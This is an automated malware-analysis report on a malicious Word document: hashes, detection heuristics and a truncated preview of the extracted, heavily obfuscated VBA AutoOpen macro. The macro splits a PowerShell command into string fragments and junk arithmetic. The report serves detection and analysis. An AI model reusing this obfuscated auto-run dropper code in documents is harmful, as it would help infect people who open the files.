Office (OLE) malware analysis — malicious · c8f1deccf39e243b

MALICIOUS

Office (OLE)

208.8 KB Created: 2018-06-22 07:58:00 Authoring application: Microsoft Office Word First seen: 2018-07-23

MD5: 449d0f2e9e887f8a8f7178ac33feaedf SHA-1: 7f4cdd0d0a3067b2c8c502f45c369d9921c51598 SHA-256: c8f1deccf39e243b97aca423d1dc7903c6bf18c158c97fd836c2f22cf35ad530

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes a Shell() call, indicating an attempt to execute arbitrary commands. The ClamAV signature 'Doc.Dropper.Agent-6585389-0' further confirms its malicious nature as a dropper. The VBA script concatenates strings to form a command, which is then executed.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6585173-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6585173-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30263 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	30263 bytes
SHA-256: `95c208a131b5b4c164a0ce7c3c231ec456333690f346aecb1b881d82a9f1d010`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "GUdQNukLSBDu" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "TIJnHwS" Function fKdvHiMz() On Error Resume Next SjZFn = (waiYo * 51058 + 78669 * CInt(pRwwv - CDbl(98764)) * 85601 * Oct(99024)) wKFkmw = "He" + "ll" + " " + "& " + "( $" + "EN" ImRDQ = (poflDz * 78704 + 69290 * CInt(qwokV - CDbl(12868)) * 48529 * Oct(68612)) akTXkCTjp = "V:" + "cOM" + "Sp" + "eC[" iMZao = (TRSIQ * 35784 + 42478 * CInt(iztkI - CDbl(78752)) * 71466 * Oct(21055)) GpsiFLzG = "4," + "26" + ",2" + "5]" + "-jo" hjFzK = (iRjCP * 49668 + 8319 * CInt(OzcRm - CDbl(57899)) * 62677 * Oct(37313)) RDoBlq = "iN" + "'')" + " ((" UiGkbV = (uRTLr * 88304 + 67372 * CInt(JJoqj - CDbl(30525)) * 13366 * Oct(81394)) XsEZKXWf = " [" + "cH" + "aR" wiljXw = (UOhlPD * 45451 + 4758 * CInt(TIzGsI - CDbl(40133)) * 31175 * Oct(41243)) MUhqUM = "[]]" + "( " + "9 ," + " 1" + "27" + " ,8" + "7 " dppmj = (rcmzk * 69420 + 45360 * CInt(mrdMz - CDbl(83005)) * 10263 * Oct(72257)) QfYEXCUvBi = ",1" + "07" + ",71" fKdvHiMz = wKFkmw + akTXkCTjp + GpsiFLzG + RDoBlq + XsEZKXWf + MUhqUM + QfYEXCUvBi uNHJjl = (JVLOVr * 57795 + 53787 * CInt(YXblFL - CDbl(67304)) * 70045 * Oct(59723)) End Function Function izcGNkSUho() On Error Resume Next BfISi = (rDvYb * 7630 + 15421 * CInt(wnPYIw - CDbl(90351)) * 25725 * Oct(2786)) AzVwjY = " ,1" + "24 " + ",13" + ",1" ZTdzj = (iXiPjK * 2440 + 5016 * CInt(LiniDW - CDbl(39026)) * 30221 * Oct(69329)) HrUABIDbiL = "6 ," + " 1" + "3, " + "67" + " ," + " 72" RwKbiZ = (ittKZr * 43100 + 22419 * CInt(EZsHmm - CDbl(23997)) * 84896 * Oct(95211)) rbcjtlz = " ," + " 9" + "0, " + "0," + "66" HiwsE = (tKPnU * 92258 + 92086 * CInt(vjHJVm - CDbl(74868)) * 33792 * Oct(44775)) jsXFwzU = ", 7" + "9," + "71," + " 72" + ", " + "78 " + ",8" izcGNkSUho = AzVwjY + HrUABIDbiL + rbcjtlz + jsXFwzU SuXcD = (jRdQSJ * 61299 + 3715 * CInt(HfjHYZ - CDbl(15763)) * 57349 * Oct(5247)) End Function Function FIHVOs() On Error Resume Next GfDWL = (pHoZKj * 33679 + 14158 * CInt(DCSfXl - CDbl(404)) * 10312 * Oct(39650)) NnBNkkFtV = "9, " + "13," + " 95" + ",7" GGKwk = (QUQzA * 62479 + 91751 * CInt(kcCqc - CDbl(57996)) * 50828 * Oct(26804)) asIZkIiDFdJ = "6 " + ", " + "67" + " ," + " 7" + "3,6" + "6 " WVWqw = (aFZiHE * 48641 + 59444 * CInt(EPtMB - CDbl(19524)) * 69042 * Oct(43926)) HVNjzdZ = ", 6" + "4 " + ", " zuujJ = (qosjnd * 26493 + 38189 * CInt(pqraz - CDbl(77707)) * 26867 * Oct(22200)) QWHmzE = "22" + " ,9" + ", " + "105" + ",11" umMkOM = (nwPqD * 70038 + 82152 * CInt(wsSLsr - CDbl(59163)) * 82906 * Oct(92185)) HhPMpIbmJ = "0, " + "12" + "6, " + "75" + ",11" XLSJZS = (jwpXQF * 50780 + 61830 * CInt(AfwdP - CDbl(9169)) * 98659 * Oct(90108)) ArRdkjlwB = "6 " + ",13" + ",16" + ",13" + ", 6" FIHVOs = NnBNkkFtV + asIZkIiDFdJ + HVNjzdZ + QWHmzE + HhPMpIbmJ + ArRdkjlwB FVCSGP = (QJqBwd * 48571 + 92950 * CInt(TnBZf - CDbl(73781)) * 85524 * Oct(60981)) End Function Function FHzIOBrD() On Error Resume Next qzsSLS = (XfTzj * 32054 + 80756 * CInt(cAwjiU - CDbl(44032)) * 11591 * Oct(4483)) OlsIYbX = "7, " + "72," + " 90" vRzVw = (dWqPP * 4761 + 95258 * CInt(YpYwFz - CDbl(42273)) * 6016 * Oct(95662)) BhPipJPYpYi = ", " + "0 ," + " 6" + "6," + "79," + " 71" + " ,7" wiqIAH = (tqvPB * 27022 + 4476 * CInt(AUMZaK - CDbl(49740)) * 5839 * Oct(96081)) PjuavF = "2,7" + "8 ," + "89 " + ",1" + "3, " + "126" FHzIOBrD = OlsIYbX + BhPipJPYpYi + PjuavF pvYAD = (sTWYT * 55796 + 38827 * CInt(jwWMC - CDbl(66625)) * 44070 * Oct(52516)) End Function Function hrfcjlbI() On Error Resume Next RFiJd = (RXbsz * 22013 + 22554 * CInt(tmtXir - CDbl(57085)) * 25010 * Oct(45059)) JGQsjL = ",84" + ", 9" + "4," + " 8" + "9 " rqinN = (PoOZG * 90591 + 46818 * CInt(PvFBrk - CDbl(43418)) * 19345 * Oct(45784)) MOqjIktr = ",7" + "2, " + "64" + " ," + " 3" + " , " dZJLo = (sEhiRn * 87773 + 56723 * CInt(bcJzm - CDbl(77909)) * 96169 * ... (truncated)

SHA-256: 95c208a131b5b4c164a0ce7c3c231ec456333690f346aecb1b881d82a9f1d010

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "GUdQNukLSBDu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TIJnHwS"
Function fKdvHiMz()
On Error Resume Next
SjZFn = (waiYo * 51058 + 78669 * CInt(pRwwv - CDbl(98764)) * 85601 * Oct(99024))
wKFkmw = "He" + "ll" + "  " + "& " + "( $" + "EN"
ImRDQ = (poflDz * 78704 + 69290 * CInt(qwokV - CDbl(12868)) * 48529 * Oct(68612))
akTXkCTjp = "V:" + "cOM" + "Sp" + "eC["
iMZao = (TRSIQ * 35784 + 42478 * CInt(iztkI - CDbl(78752)) * 71466 * Oct(21055))
GpsiFLzG = "4," + "26" + ",2" + "5]" + "-jo"
hjFzK = (iRjCP * 49668 + 8319 * CInt(OzcRm - CDbl(57899)) * 62677 * Oct(37313))
RDoBlq = "iN" + "'')" + " (("
UiGkbV = (uRTLr * 88304 + 67372 * CInt(JJoqj - CDbl(30525)) * 13366 * Oct(81394))
XsEZKXWf = " [" + "cH" + "aR"
wiljXw = (UOhlPD * 45451 + 4758 * CInt(TIzGsI - CDbl(40133)) * 31175 * Oct(41243))
MUhqUM = "[]]" + "( " + "9 ," + " 1" + "27" + " ,8" + "7 "
dppmj = (rcmzk * 69420 + 45360 * CInt(mrdMz - CDbl(83005)) * 10263 * Oct(72257))
QfYEXCUvBi = ",1" + "07" + ",71"
fKdvHiMz = wKFkmw + akTXkCTjp + GpsiFLzG + RDoBlq + XsEZKXWf + MUhqUM + QfYEXCUvBi
uNHJjl = (JVLOVr * 57795 + 53787 * CInt(YXblFL - CDbl(67304)) * 70045 * Oct(59723))
End Function
Function izcGNkSUho()
On Error Resume Next
BfISi = (rDvYb * 7630 + 15421 * CInt(wnPYIw - CDbl(90351)) * 25725 * Oct(2786))
AzVwjY = " ,1" + "24 " + ",13" + ",1"
ZTdzj = (iXiPjK * 2440 + 5016 * CInt(LiniDW - CDbl(39026)) * 30221 * Oct(69329))
HrUABIDbiL = "6 ," + " 1" + "3, " + "67" + " ," + " 72"
RwKbiZ = (ittKZr * 43100 + 22419 * CInt(EZsHmm - CDbl(23997)) * 84896 * Oct(95211))
rbcjtlz = " ," + " 9" + "0, " + "0," + "66"
HiwsE = (tKPnU * 92258 + 92086 * CInt(vjHJVm - CDbl(74868)) * 33792 * Oct(44775))
jsXFwzU = ", 7" + "9," + "71," + " 72" + ", " + "78 " + ",8"
izcGNkSUho = AzVwjY + HrUABIDbiL + rbcjtlz + jsXFwzU
SuXcD = (jRdQSJ * 61299 + 3715 * CInt(HfjHYZ - CDbl(15763)) * 57349 * Oct(5247))
End Function
Function FIHVOs()
On Error Resume Next
GfDWL = (pHoZKj * 33679 + 14158 * CInt(DCSfXl - CDbl(404)) * 10312 * Oct(39650))
NnBNkkFtV = "9, " + "13," + " 95" + ",7"
GGKwk = (QUQzA * 62479 + 91751 * CInt(kcCqc - CDbl(57996)) * 50828 * Oct(26804))
asIZkIiDFdJ = "6 " + ", " + "67" + " ," + " 7" + "3,6" + "6 "
WVWqw = (aFZiHE * 48641 + 59444 * CInt(EPtMB - CDbl(19524)) * 69042 * Oct(43926))
HVNjzdZ = ", 6" + "4 " + ", "
zuujJ = (qosjnd * 26493 + 38189 * CInt(pqraz - CDbl(77707)) * 26867 * Oct(22200))
QWHmzE = "22" + " ,9" + ", " + "105" + ",11"
umMkOM = (nwPqD * 70038 + 82152 * CInt(wsSLsr - CDbl(59163)) * 82906 * Oct(92185))
HhPMpIbmJ = "0, " + "12" + "6, " + "75" + ",11"
XLSJZS = (jwpXQF * 50780 + 61830 * CInt(AfwdP - CDbl(9169)) * 98659 * Oct(90108))
ArRdkjlwB = "6 " + ",13" + ",16" + ",13" + ", 6"
FIHVOs = NnBNkkFtV + asIZkIiDFdJ + HVNjzdZ + QWHmzE + HhPMpIbmJ + ArRdkjlwB
FVCSGP = (QJqBwd * 48571 + 92950 * CInt(TnBZf - CDbl(73781)) * 85524 * Oct(60981))
End Function
Function FHzIOBrD()
On Error Resume Next
qzsSLS = (XfTzj * 32054 + 80756 * CInt(cAwjiU - CDbl(44032)) * 11591 * Oct(4483))
OlsIYbX = "7, " + "72," + " 90"
vRzVw = (dWqPP * 4761 + 95258 * CInt(YpYwFz - CDbl(42273)) * 6016 * Oct(95662))
BhPipJPYpYi = ", " + "0 ," + " 6" + "6," + "79," + " 71" + " ,7"
wiqIAH = (tqvPB * 27022 + 4476 * CInt(AUMZaK - CDbl(49740)) * 5839 * Oct(96081))
PjuavF = "2,7" + "8 ," + "89 " + ",1" + "3, " + "126"
FHzIOBrD = OlsIYbX + BhPipJPYpYi + PjuavF
pvYAD = (sTWYT * 55796 + 38827 * CInt(jwWMC - CDbl(66625)) * 44070 * Oct(52516))
End Function
Function hrfcjlbI()
On Error Resume Next
RFiJd = (RXbsz * 22013 + 22554 * CInt(tmtXir - CDbl(57085)) * 25010 * Oct(45059))
JGQsjL = ",84" + ", 9" + "4," + " 8" + "9 "
rqinN = (PoOZG * 90591 + 46818 * CInt(PvFBrk - CDbl(43418)) * 19345 * Oct(45784))
MOqjIktr = ",7" + "2, " + "64" + " ," + " 3" + " , "
dZJLo = (sEhiRn * 87773 + 56723 * CInt(bcJzm - CDbl(77909)) * 96169 *
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.